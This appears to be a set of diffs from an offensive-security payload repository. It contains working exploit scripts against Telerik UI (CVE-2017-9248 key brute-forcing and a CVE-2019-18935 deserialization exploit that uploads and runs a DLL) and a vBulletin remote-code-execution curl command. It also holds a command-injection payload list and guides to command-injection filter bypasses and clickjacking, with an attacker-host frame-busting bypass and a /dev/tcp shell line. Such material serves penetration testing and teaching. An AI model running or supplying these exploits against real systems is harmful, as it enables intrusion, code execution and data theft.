    print("EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,VGVsZXJpay5XZWIuVUkuRWRpdG9yLkRpYWxvZ0NvbnRyb2xzLkRvY3VtZW50TWFuYWdlckRpYWxvZywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxNi4yLjUwNC40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0;AllowMultipleSelection,False,3,False")
    print("")
    print("Ciphertext:")
    print("FhQAWBwoPl9maHYCJlx8YlZwQDAdYxRBYlgDNSJxFzZ9PUEWVlhgXHhxFipXdWR0HhV3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMLciMVMnN9AFJ0Z2EDWG4sPCpnZQMtHhRnWx8SFHBuaHZbEQJgAVdwbjwlcxNeVHY9ARgUOj9qF045eXBkSVMWEXFgX2QxHgRjSRESf1htY0BwHWZKTm9kTz8IcAwFZm0HNSNxBC5lA39zVH57Q2EJDndvYUUzCAVFRBw/KmJiZwAOCwB8WGxvciwlcgdaVH0XKiIudz98Ams6UWFjQ3oCPBJ4X0EzHXJwCRURMnVVXX5eJnZkcldgcioecxdeanMLNCAUdz98AWMrV354XHsFCTVjenh1HhdBfhwdLmVUd0BBHWZgc1RgQCoRBikEamY9ARgUOj9qF047eXJ/R3kFIzF4dkYJJnF7WCcCKgVuaGpHJgMHZWxvaikIcR9aUn0LKg0HAzZ/dGMzV3Fgc1QsfXVWAGQ9FXEMRSECEEZTdnpOJgJoRG9wbj8SfClFamBwLiMUFzZiKX8wVgRjQ3oCM3FjX14oIHJ3WCECLkl7dmpOIGZnR3h0QCcmYwgHZXMDMBEXNg9TdXcxVGEDZVVyEixUcUoDHRRNSh8WMUl7dWJfJnl8WHoHbnIgcxNLUlgDNRMELi1SAwAtVgd0WFMGIzVnX3Q3J3FgQwgGMQRjd35CHgJkXG8FbTUWWQNBUwcQNQwAOiRmPmtzY1psfmcVMBNvZUooJy5ZQgkuFENuZ0BBHgFgWG9aVDMlbBdCUgdxMxMELi1SAwAtY35aR20UcS5XZWc3Fi5zQyZ3E0B6c0BgFgBoTmJbUA0ncwMHfmMtJxdzLnRmKG8xUWB8aGIvBi1nSF5xEARBYyYDKmtSeGJWCXQHBmxaDRUhYwxLVX01CyByCHdnEHcUUXBGaHkVBhNjAmh1ExVRWycCCEFiXnptEgJaBmJZVHUeBR96ZlsLJxYGMjJpHFJyYnBGaGQZEhFjZUY+FxZvUScCCEZjXnpeCVtjAWFgSAQhcXBCfn0pCyAvFHZkL3RzeHMHdFNzIBR4A2g+HgZdZyATNmZ6aG5WE3drQ2wFCQEnBD12YVkDLRdzMj9pEl0MYXBGaVUHEi94XGA3HS5aRyAAd0JlXQltEgBnTmEHagAJX3BqY1gtCAwvBzJ/dH8wV3EPA2MZEjVRdV4zJgRjZB8SPl9uA2pHJgMGR2dafjUnBhBBfUw9ARgUOj9qFQR+")
    print("")
 def mode_b64e():
    print(base64.b64encode(args.parameter.encode()).decode())
    print("")
 def mode_b64d():
    print(base64.b64decode(args.parameter.encode()).decode())
    print("")
 sys.stderr.write(
              "\ndp_crypto by Paul Taylor / @bao7uo\nCVE-2017-9248 - " +
              "Telerik.Web.UI.dll Cryptographic compromise\n\n"
            )
 p = argparse.ArgumentParser()
 subparsers = p.add_subparsers()
 decrypt_parser = subparsers.add_parser('d', help='Decrypt a ciphertext')
 decrypt_parser.set_defaults(func=mode_decrypt)
 decrypt_parser.add_argument('ciphertext', action='store', type=str, default='', help='Ciphertext to decrypt')
 decrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
 encrypt_parser = subparsers.add_parser('e', help='Encrypt a plaintext')
 encrypt_parser.set_defaults(func=mode_encrypt)
 encrypt_parser.add_argument('plaintext', action='store', type=str, default='', help='Ciphertext to decrypt')
 encrypt_parser.add_argument('key', action='store', type=str, default='', help='Key to decrypt')
 brute_parser = subparsers.add_parser('k', help='Bruteforce key/generate URL')
 brute_parser.set_defaults(func=mode_brutekey)
 brute_parser.add_argument('-u', '--url', action='store', type=str, help='Target URL')
 brute_parser.add_argument('-l', '--key-len', action='store', type=int, default=48, help='Len of the key to retrieve, OPTIONAL: default is 48')
 brute_parser.add_argument('-o', '--oracle', action='store', type=str, default='Index was outside the bounds of the array.', help='The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message')
 brute_parser.add_argument('-v', '--version', action='store', type=str, default='', help='OPTIONAL. Specify the version to use rather than iterating over all of them')
 brute_parser.add_argument('-c', '--charset', action='store', type=str, default='hex', help='Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex')
 brute_parser.add_argument('-a', '--accuracy', action='store', type=int, default=9, help='Maximum accuracy is out of 64 where 64 is the most accurate, \
    accuracy of 9 will usually suffice for a hex, but 21 or more might be needed when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.')
 brute_parser.add_argument('-p', '--proxy', action='store', type=str, default='', help='Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080')
 encode_parser = subparsers.add_parser('b', help='Encode parameter to base64')
 encode_parser.set_defaults(func=mode_b64e)
 encode_parser.add_argument('parameter', action='store', type=str, help='Parameter to encode')
 decode_parser = subparsers.add_parser('p', help='Decode base64 parameter')
 decode_parser.set_defaults(func=mode_b64d)
 decode_parser.add_argument('parameter', action='store', type=str, help='Parameter to decode')
 args = p.parse_args()
 if len(sys.argv) > 2:
    args.func()
--- a/CVE-2019-18935.py
+++ b/CVE-2019-18935.py
@@ -0,0 +1,140 @@
 #!/usr/bin/env python3
 # origin : https://github.com/noperator/CVE-2019-18935
 # INSTALL: 
 # git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
 #  python3 -m venv env
 #  source env/bin/activate
 #  pip3 install -r requirements.txt
 # Import encryption routines.
 from sys import path
 path.insert(1, 'RAU_crypto')
 from RAU_crypto import RAUCipher
 from argparse import ArgumentParser
 from json import dumps, loads
 from os.path import basename, splitext
 from pprint import pprint
 from requests import post
 from requests.packages.urllib3 import disable_warnings
 from sys import stderr
 from time import time
 from urllib3.exceptions import InsecureRequestWarning
 disable_warnings(category=InsecureRequestWarning)
 def send_request(files):
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'Connection': 'close',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Upgrade-Insecure-Requests': '1'
    }
    response = post(url, files=files, verify=False, headers=headers)
    try:
        result = loads(response.text)
        result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
        pprint(result)
    except:
        print(response.text)
 def build_raupostdata(object, type):
    return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
 def upload():
    # Build rauPostData.
    object = {
        'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
        'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
        'MaxFileSize': 0,
        'TimeToLive': {  # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
            'Ticks': 1440000000000,
            'Days': 0,
            'Hours': 40,
            'Minutes': 0,
            'Seconds': 0,
            'Milliseconds': 0,
            'TotalDays': 1.6666666666666666,
            'TotalHours': 40,
            'TotalMinutes': 2400,
            'TotalSeconds': 144000,
            'TotalMilliseconds': 144000000
        },
        'UseApplicationPoolImpersonation': False
    }
    type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
    raupostdata = build_raupostdata(object, type)
    with open(filename_local, 'rb') as f:
        payload = f.read()
    metadata = {
        'TotalChunks': 1,
        'ChunkIndex': 0,
        'TotalFileSize': 1,
        'UploadID': filename_remote  # Determines remote filename on disk.
    }
    # Build multipart form data.
    files = {
        'rauPostData': (None, raupostdata),
        'file': (filename_remote, payload, 'application/octet-stream'),
        'fileName': (None, filename_remote),
        'contentType': (None, 'application/octet-stream'),
        'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
        'metadata': (None, dumps(metadata))
    }
    # Send request.
    print('[*] Local payload name: ', filename_local, file=stderr)
    print('[*] Destination folder: ', temp_target_folder, file=stderr)
    print('[*] Remote payload name:', filename_remote, file=stderr)
    print(file=stderr)
    send_request(files)
 def deserialize():
    # Build rauPostData.
    object = {
        'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
    }
    type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
    raupostdata = build_raupostdata(object, type)
    # Build multipart form data.
    files = {
        'rauPostData': (None, raupostdata),  # Only need this now.
        '': ''  # One extra input is required for the page to process the request.
    }
    # Send request.
    print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
    start = time()
    send_request(files)
    end = time()
    print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
 if __name__ == '__main__':
    parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
    parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
    parser.add_argument('-v', dest='ui_version', required=True, help='software version')
    parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
    parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
    parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
    parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
    args = parser.parse_args()
    temp_target_folder = args.folder.replace('/', '\\')
    ui_version = args.ui_version
    net_version = args.net_version
    filename_local = args.payload
    filename_remote = str(time()) + splitext(basename(filename_local))[1]
    url = args.url
    upload()
    if not args.test_upload:
        deserialize()
--- a/Exploits/vBulletin
+++ b/Exploits/vBulletin
@@ -0,0 +1 @@
 curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"
--- a/Clickjacking/README.md
+++ b/Clickjacking/README.md
@@ -0,0 +1,221 @@
 # Clickjacking: Web Application Security Vulnerability
 > Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives,
 > potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions
 > as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions
 > that a normal user can do on a legitimate website can be done using clickjacking.
 ## Summary
 * [Tools](#tools)
 * [Methodology](#methodology)
  * [UI Redressing](#ui-redressing)
  * [Invisible Frames](#invisible-frames)
  * [Button/Form Hijacking](#buttonform-hijacking)
  * [Execution Methods](#execution-methods)
 * [Preventive Measures](#preventive-measures)
  * [Implement X-Frame-Options Header](#implement-x-frame-options-header)
  * [Content Security Policy (CSP)](#content-security-policy-csp)
  * [Disabling JavaScript](#disabling-javascript)
 * [OnBeforeUnload Event](#onbeforeunload-event)
 * [XSS Filter](#xss-filter)
  * [IE8 XSS filter](#ie8-xss-filter)
  * [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
 * [Challenge](#challenge)
 * [Practice Environments](#practice-environments)
 * [Reference](#references)
 ## Tools
 * [Burp Suite](https://portswigger.net/burp)
 * [OWASP ZAP](https://github.com/zaproxy/zaproxy)
 * [Clickjack](https://github.com/machine1337/clickjack)
 ## Methodology
 ### UI Redressing
 UI Redressing is a Clickjacking technique where an attacker overlays a transparent UI element on top of a legitimate website or application. 
 The transparent UI element contains malicious content or actions that are visually hidden from the user. By manipulating the transparency and positioning of elements, 
 the attacker can trick the user into interacting with the hidden content, believing they are interacting with the visible interface.
 * **How UI Redressing Works:**
  * Overlaying Transparent Element: The attacker creates a transparent HTML element (usually a `<div>`) that covers the entire visible area of a legitimate website. This element is made transparent using CSS properties like `opacity: 0;`.
  * Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it.
  * Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element.
  * User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations.
 ```html
 <div style="opacity: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;">
  <a href="malicious-link">Click me</a>
 </div>
 ```
 ### Invisible Frames
 Invisible Frames is a Clickjacking technique where attackers use hidden iframes to trick users into interacting with content from another website unknowingly. 
 These iframes are made invisible by setting their dimensions to zero (height: 0; width: 0;) and removing their borders (border: none;). 
 The content inside these invisible frames can be malicious, such as phishing forms, malware downloads, or any other harmful actions.
 * **How Invisible Frames Work:**
  * Hidden IFrame Creation: The attacker includes an `<iframe>` element in a webpage, setting its dimensions to zero and removing its border, making it invisible to the user.
    ```html
    <iframe src="malicious-site" style="opacity: 0; height: 0; width: 0; border: none;"></iframe>
    ```
  * Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible.
  * User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe.
  * Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent.
 ### Button/Form Hijacking
 Button/Form Hijacking is a Clickjacking technique where attackers trick users into interacting with invisible or hidden buttons/forms, leading to unintended actions on a legitimate website. By overlaying deceptive elements on top of visible buttons or forms, attackers can manipulate user interactions to perform malicious actions without the user's knowledge.
 * **How Button/Form Hijacking Works:**
 * Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it.
   ```html
   <button onclick="submitForm()">Click me</button>
   ```
 * Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form.
    ```html
    <form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
    <!-- Hidden form fields -->
    </form>
    ```
 * Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
   ```html
   <button onclick="submitForm()">Click me</button>
   <form action="legitimate-site" method="POST" id="hidden-form">
     <!-- Hidden form fields -->
   </form>
   <script>
     function submitForm() {
       document.getElementById('hidden-form').submit();
     }
   </script>
    ```
 ### Execution Methods
 * Creating Hidden Form: The attacker creates a hidden form containing malicious input fields, targeting a vulnerable action on the victim's website. This form remains invisible to the user.
 ```html
  <form action="malicious-site" method="POST" id="hidden-form" style="display: none;">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="action" value="transfer-funds">
  </form>
 ```
 * Overlaying Visible Element: The attacker overlays a visible element (button or form) on their malicious page, encouraging users to interact with it. When the user clicks the visible element, they unknowingly trigger the hidden form's submission.
  * Example in javascript:
 ```js
    function submitForm() {
  document.getElementById('hidden-form').submit();
  }
 ```
 ## Preventive Measures
 ### Implement X-Frame-Options Header
 Implement the X-Frame-Options header with the DENY or SAMEORIGIN directive to prevent your website from being embedded within an iframe without your consent.
 ```apache
 Header always append X-Frame-Options SAMEORIGIN
 ```
 ### Content Security Policy (CSP)
 Use CSP to control the sources from which content can be loaded on your website, including scripts, styles, and frames. 
 Define a strong CSP policy to prevent unauthorized framing and loading of external resources.
 Example in HTML meta tag:
 ```html
 <meta http-equiv="Content-Security-Policy" content="frame-ancestors 'self';">
 ```
 ### Disabling JavaScript
 * Since these type of client side protections relies on JavaScript frame busting code, if the victim has JavaScript disabled or it is possible for an attacker to disable JavaScript code, the web page will not have any protection mechanism against clickjacking.
 * There are three deactivation techniques that can be used with frames:
  * Restricted frames with Internet Explorer: Starting from IE6, a frame can have the "security" attribute that, if it is set to the value "restricted", ensures that JavaScript code, ActiveX controls, and re-directs to other sites do not work in the frame.
  ```html
  <iframe src="http://target site" security="restricted"></iframe>
  ```
  * Sandbox attribute: with HTML5 there is a new attribute called “sandbox”. It enables a set of restrictions on content loaded into the iframe. At this moment this attribute is only compatible with Chrome and Safari.
  ```html
  <iframe src="http://target site" sandbox></iframe>
  ```
 ## OnBeforeUnload Event
 * The `onBeforeUnload` event could be used to evade frame busting code. This event is called when the frame busting code wants to destroy the iframe by loading the URL in the whole web page and not only in the iframe. The handler function returns a string that is prompted to the user asking confirm if he wants to leave the page. When this string is displayed to the user is likely to cancel the navigation, defeating target’s frame busting attempt.
 * The attacker can use this attack by registering an unload event on the top page using the following example code:
 ```html
 <h1>www.fictitious.site</h1>
 <script>
     window.onbeforeunload = function()
     {
         return " Do you want to leave fictitious.site?";
     }
 </script>
 <iframe src="http://target site">
 ```
 * The previous technique requires the user interaction but, the same result, can be achieved without prompting the user. To do this the attacker have to automatically cancel the incoming navigation request in an onBeforeUnload event handler by repeatedly submitting (for example every millisecond) a navigation request to a web page that responds with a _"HTTP/1.1 204 No Content"_ header.
 <br>_204 page:_
 ```php
 <?php
    header("HTTP/1.1 204 No Content");
 ?>
 ```
 _Attacker's Page_
 ```js
 <script>
    var prevent_bust = 0;
    window.onbeforeunload = function() {
        prevent_bust++;
    };
    setInterval(
        function() {
            if (prevent_bust > 0) {
                prevent_bust -= 2;
                window.top.location = "http://attacker.site/204.php";
            }
        }, 1);
 </script>
 <iframe src="http://target site">
 ```
 ## XSS Filter
 ### IE8 XSS filter 
 This filter has visibility into all parameters of each request and response flowing through the web browser and it compares them to a set of regular expressions in order to look for reflected XSS attempts. When the filter identifies a possible XSS attacks; it disables all inline scripts within the page, including frame busting scripts (the same thing could be done with external scripts). For this reason an attacker could induce a false positive by inserting the beginning of the frame busting script into a request’s parameters.
  ```html
  <script>
      if ( top != self )
      {
          top.location=self.location;
      }
  </script>
  ```
  Attacker View:
  ```html
  <iframe src=”http://target site/?param=<script>if”>
  ```
 ### Chrome 4.0 XSSAuditor filter
 It has a little different behaviour compared to IE8 XSS filter, in fact with this filter an attacker could deactivate a “script” by passing its code in a request parameter. This enables the framing page to specifically target a single snippet containing the frame busting code, leaving all the other codes intact.
  Attacker View:
  ```html
  <iframe src=”http://target site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>
  ```
 ## Challenge
 Inspect the following code:
 ```html
 <div style="position: absolute; opacity: 0;">
  <iframe src="https://legitimate-site.com/login" width="500" height="500"></iframe>
 </div>
 <button onclick="document.getElementsByTagName('iframe')[0].contentWindow.location='malicious-site.com';">Click me</button>
 ```
 Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
 ## Practice Environments
 * [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
 * [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
 ## References
 * [Clickjacker.io - Saurabh Banawar](https://clickjacker.io)
 * [Web-Security Clickjacking - PortSwigger](https://portswigger.net/web-security/clickjacking)
 * [Synopsys Clickjacking](https://www.synopsys.com/glossary/what-is-clickjacking.html#B)
 * [OWASP - Gustav Rydstedt](https://owasp.org/www-community/attacks/Clickjacking)
 * [SecTheory](http://www.sectheory.com/clickjacking.htm)
--- a/Injection/Intruder/command-execution-unix.txt
+++ b/Injection/Intruder/command-execution-unix.txt
@@ -3,19 +3,28 @@
 &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
 &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
 /index.html|id|
 ";id;"
 ';id;'
 ;id;
 ;id
 ;netstat -a;
-;id;
+"|id|"
 '|id|'
 |id
 |/usr/bin/id
 |id|
 "|/usr/bin/id|"
 '|/usr/bin/id|'
 |/usr/bin/id|
 "||/usr/bin/id|"
 '||/usr/bin/id|'
 ||/usr/bin/id|
 |id;
 ||/usr/bin/id;
 ;id|
 ;|/usr/bin/id|
 "\n/bin/ls -al\n"
 '\n/bin/ls -al\n'
 \n/bin/ls -al\n
 \n/usr/bin/id\n
 \nid\n
@@ -56,8 +65,12 @@ a|/usr/bin/id
 %0Acat%20/etc/passwd
 %0A/usr/bin/id
 %0Aid
 %22%0A/usr/bin/id%0A%22
 %27%0A/usr/bin/id%0A%27
 %0A/usr/bin/id%0A
 %0Aid%0A
 "& ping -i 30 127.0.0.1 &"
 '& ping -i 30 127.0.0.1 &'
 & ping -i 30 127.0.0.1 &
 & ping -n 30 127.0.0.1 &
 %0a ping -i 30 127.0.0.1 %0a
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -8,30 +8,63 @@
 * [Exploits](#exploits)
  * [Basic commands](#basic-commands)
  * [Chaining commands](#chaining-commands)
  * [Argument injection](#argument-injection)
  * [Inside a command](#inside-a-command)
 * [Filter Bypasses](#filter-bypasses)
  * [Bypass without space](#bypass-without-space)
  * [Bypass with a line return](#bypass-with-a-line-return)
  * [Bypass with backslash newline](#bypass-with-backslash-newline)
  * [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
  * [Bypass blacklisted words](#bypass-blacklisted-words)
-   * [Bypass with single quote](#bypass-with-a-single-quote)
+   * [Bypass with single quote](#bypass-with-single-quote)
-   * [Bypass with double quote](#bypass-with-a-double-quote)
+   * [Bypass with double quote](#bypass-with-double-quote)
   * [Bypass with backticks](#bypass-with-backticks)
   * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
-   * [Bypass with $@](#bypass-with-----)
+   * [Bypass with $@](#bypass-with-)
   * [Bypass with $()](#bypass-with--1)
   * [Bypass with variable expansion](#bypass-with-variable-expansion)
   * [Bypass with wildcards](#bypass-with-wildcards)
 * [Data Exfiltration](#data-exfiltration)
  * [Time based data exfiltration](#time-based-data-exfiltration)
  * [DNS based data exfiltration](#dns-based-data-exfiltration)
 * [Polyglot Command Injection](#polyglot-command-injection)
 * [Tricks](#tricks)
  * [Backgrounding long running commands](#backgrounding-long-running-commands)
  * [Remove arguments after the injection](#remove-arguments-after-the-injection)
 * [Labs](#labs)
 * [Challenge](#challenge)
 * [Time based data exfiltration](#time-based-data-exfiltration)
 * [DNS based data exfiltration](#dns-based-data-exfiltration)
 * [Polyglot command injection](#polyglot-command-injection)
 * [References](#references)
-    
+
 ## Tools
-* [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix)
+* [commixproject/commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool
 * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library
 ## Exploits
 Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system.
 The danger of command injection is that it can allow an attacker to execute any command on the system, potentially leading to full system compromise.
 **Example of Command Injection with PHP**:    
 Suppose you have a PHP script that takes a user input to ping a specified IP address or domain:
 ```php
 <?php
    $ip = $_GET['ip'];
    system("ping -c 4 " . $ip);
 ?>
 ```
 In the above code, the PHP script uses the `system()` function to execute the `ping` command with the IP address or domain provided by the user through the `ip` GET parameter.
 If an attacker provides input like `8.8.8.8; cat /etc/passwd`, the actual command that gets executed would be: `ping -c 4 8.8.8.8; cat /etc/passwd`.
 This means the system would first `ping 8.8.8.8` and then execute the `cat /etc/passwd` command, which would display the contents of the `/etc/passwd` file, potentially revealing sensitive information.
 ### Basic commands
 Execute the command and voila :p
@@ -42,84 +75,191 @@ root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 ...
 ```
 ### Chaining commands
 In many command-line interfaces, especially Unix-like systems, there are several characters that can be used to chain or manipulate commands. 
 * `;` (Semicolon): Allows you to execute multiple commands sequentially.
 * `&&` (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
 * `||` (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
 * `&` (Background): Execute the command in the background, allowing the user to continue using the shell.
 * `|` (Pipe):  Takes the output of the first command and uses it as the input for the second command.
 ```powershell
-original_cmd_by_server; ls
+command1; command2   # Execute command1 and then command2
-original_cmd_by_server && ls
+command1 && command2 # Execute command2 only if command1 succeeds
-original_cmd_by_server | ls
+command1 || command2 # Execute command2 only if command1 fails
-original_cmd_by_server || ls    Only if the first cmd fail
+command1 & command2  # Execute command1 in the background
 command1 | command2  # Pipe the output of command1 into command2
 ```
 ### Argument Injection
 Gain a command execution when you can only append arguments to an existing command.
 Use this website [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/) to find the argument to inject to gain command execution.
 * Chrome
    ```ps1
    chrome '--gpu-launcher="id>/tmp/foo"'
    ```
 * SSH
    ```ps1
    ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
    ```
 * psql
    ```ps1
    psql -o'|id>/tmp/foo'
    ```
 ### Inside a command
-```bash
+* Command injection using backticks. 
-original_cmd_by_server `cat /etc/passwd`
+  ```bash
-original_cmd_by_server $(cat /etc/passwd)
+  original_cmd_by_server `cat /etc/passwd`
-```
+  ```
 * Command injection using substitution
  ```bash
  original_cmd_by_server $(cat /etc/passwd)
  ```
 ## Filter Bypasses
 ### Bypass without space
-Works on Linux only.
+* `$IFS` is a special shell variable called the Internal Field Separator. By default, in many shells, it contains whitespace characters (space, tab, newline). When used in a command, the shell will interpret `$IFS` as a space. `$IFS` does not directly work as a seperator in commands like `ls`, `wget`; use `${IFS}` instead. 
  ```powershell
  cat${IFS}/etc/passwd
  ls${IFS}-la
  ```
 * In some shells, brace expansion generates arbitrary strings. When executed, the shell will treat the items inside the braces as separate commands or arguments.
  ```powershell
  {cat,/etc/passwd}
  ```
 * Input redirection. The < character tells the shell to read the contents of the file specified. 
  ```powershell
  cat</etc/passwd
  sh</dev/tcp/127.0.0.1/4242
  ```
 * ANSI-C Quoting 
  ```powershell
  X=$'uname\x20-a'&&$X
  ```
 * The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value `09`.
  ```powershell
  ;ls%09-al%09/home
  ```
 * In Windows, `%VARIABLE:~start,length%` is a syntax used for substring operations on environment variables.
  ```powershell
  ping%CommonProgramFiles:~10,-18%127.0.0.1
  ping%PROGRAMFILES:~10,-5%127.0.0.1
  ```
 ```powershell
 swissky@crashlab:~/Www$ cat</etc/passwd
 root:x:0:0:root:/root:/bin/bash
 swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd}
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 swissky@crashlab▸ ~ ▸ $ cat$IFS/etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 swissky@crashlab▸ ~ ▸ $ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
 RCE
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 swissky@crashlab▸ ~ ▸ $ X=$'uname\x20-a'&&$X
 Linux crashlab 4.4.X-XX-generic #72-Ubuntu
 swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
 ```
 Commands execution without spaces, $ or { } - Linux (Bash only)
 ```powershell
 IFS=,;`cat<<<uname,-a`
 ```
 Works on Windows only.
 ```powershell
 ping%CommonProgramFiles:~10,-18%IP
 ping%PROGRAMFILES:~10,-5%IP
 ```
 ### Bypass with a line return
-```powershell
+Commands can also be run in sequence with newlines
-something%0Acat%20/etc/passwd
+
 ```bash
 original_cmd_by_server
 ls
 ```
 ### Bypass with backslash newline
 * Commands can be broken into parts by using backslash followed by a newline
  ```powershell
  $ cat /et\
  c/pa\
  sswd
  ```
 * URL encoded form would look like this:
  ```powershell
  cat%20/et%5C%0Ac/pa%5C%0Asswd
  ```
 ### Bypass characters filter via hex encoding
 ```powershell
 swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
 /etc/passwd
 swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
 root:x:0:0:root:/root:/bin/bash
 swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
 root:x:0:0:root:/root:/bin/bash
 swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
 root:x:0:0:root:/root:/bin/bash
 swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
 /etc/passwd
 swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
